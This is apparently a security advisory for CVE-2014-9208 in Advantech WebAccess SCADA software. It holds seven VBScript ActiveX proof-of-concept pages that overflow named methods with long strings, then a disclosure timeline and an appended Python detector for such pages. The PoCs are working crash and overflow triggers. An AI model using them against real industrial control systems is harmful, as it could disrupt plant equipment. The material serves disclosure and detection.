Introduction
*********************************************************************************
Advantech WebAccess SCADA software is used to remotely manage industrial control
system devices such as RTUs, generators and motors. Attackers can execute code
remotely by passing a maliciously crafted string to the ConvToSafeArray API in the
ASPVCOBJLib.AspDataDriven ActiveX control.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll

CVE-2014-9208
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX UpdateProject Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype= "Sub UpdateProject ( ByVal WwwPort As String ,ByVal ProjName As String ,ByVal ProjIP As String ,ByVal ProjPort As Long ,ByVal ProjTimeout As Long ,ByVal ProjDir As String )"
-->
arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Function InterfaceFilter ( ByVal Interface As String ) As String"
-->
arg1=String(1044, "A")
target.InterfaceFilter arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX FileProcess Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Sub FileProcess ( ByVal Type As Integer ,ByVal FileName As String )"
-->
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Function GetWideStrCpy ( ByVal Type As Integer ,ByVal inStr As String ) As String"
-->
arg1=1
arg2=String(1044, "A")
target.GetWideStrCpy arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Function GetRecipeInfo ( ByVal Type As Integer ,ByVal filePath As String )"
-->
arg1=1
arg2=String(1044, "A")
target.GetRecipeInfo arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->
arg1=String(1044, "A")
target.GetLastTagNbr arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype= "Function ConvToSafeArray ( ByVal ArrSize As Integer ,ByVal inStr As String )"
-->
arg1=1
arg2=String(2068, "A")
target.ConvToSafeArray arg1 ,arg2
</script></html>
*********************************************************************************
The vulnerabilities were reported to Advantech sometime in January/February 2015,
coordinated through CSOC. Since April 2015 they have been postponing the fix.
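
Detection sketch, added here as an example and not part of the original advisory: a content check (for a web proxy or mail gateway) that flags pages instantiating either class ID above and calling one of the listed methods with an overlong string argument. The function names and the 512-character threshold are assumptions.

```python
import re

# Class IDs and method names (lowercased) are the ones in the advisory's PoCs.
CLSIDS = {"3703BA5D-7329-4E60-A1A5-AE7D6DF267C1",
          "89D00354-B2EA-4755-915D-615D3962C7D7"}
METHODS = {"updateproject", "interfacefilter", "fileprocess", "getwidestrcpy",
           "getrecipeinfo", "getlasttagnbr", "convtosafearray"}
MAX_ARG_LEN = 512  # assumption: longest string argument considered normal

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*['"]?([^'"\s>]+)""", re.I)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(?:String\(\s*(\d+)|"([^"]*)")', re.I | re.M)
CALL_RE = re.compile(r"\b(\w+)\.(\w+)[ \t]*\(?(.*)$", re.M)

def arg_lengths(args, var_len):
    """Yield the length of each string argument that can be resolved statically."""
    yield from (int(n) for n in re.findall(r"String\(\s*(\d+)", args, re.I))
    yield from (len(s) for s in re.findall(r'"([^"]*)"', args))
    yield from (var_len.get(t.strip().lower(), 0) for t in args.split(","))

def scan(html):
    """Return (object id, method, longest argument length) for each flagged call."""
    targets = set()
    for tag in OBJECT_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        clsid = attrs.get("classid", "").split(":")[-1].strip("{}").upper()
        if clsid in CLSIDS and "id" in attrs:
            targets.add(attrs["id"].lower())
    var_len = {}  # VBScript variable name -> length of the string assigned to it
    for name, count, literal in ASSIGN_RE.findall(html):
        var_len[name.lower()] = int(count) if count else len(literal)
    findings = []
    for obj, method, args in CALL_RE.findall(html):
        if obj.lower() in targets and method.lower() in METHODS:
            longest = max(arg_lengths(args, var_len), default=0)
            if longest > MAX_ARG_LEN:
                findings.append((obj, method, longest))
    return findings

# Constructed sample page modelled on the FileProcess PoC above.
SAMPLE = """<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
target.GetLastTagNbr "Tag01"
</script>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Only arguments written as literals, String(n, c) calls or variables assigned that way are resolved; strings built at run time need a script-aware engine.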